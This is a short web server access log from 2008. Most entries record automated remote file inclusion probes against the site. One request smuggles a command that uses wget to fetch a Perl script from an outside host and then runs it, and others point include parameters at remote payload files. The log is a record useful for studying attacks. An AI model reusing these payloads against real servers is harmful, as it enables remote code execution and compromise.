65.46.13.250 - - [15/Jun/2008:18:30:13 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.28.45 - - [15/Jun/2008:18:31:19 -0700] "GET /logs/access_080519.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:18:31:21 -0700] "GET /logs/access_080602.log/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:18:31:24 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:18:31:25 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
67.195.51.168 - - [15/Jun/2008:18:33:35 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
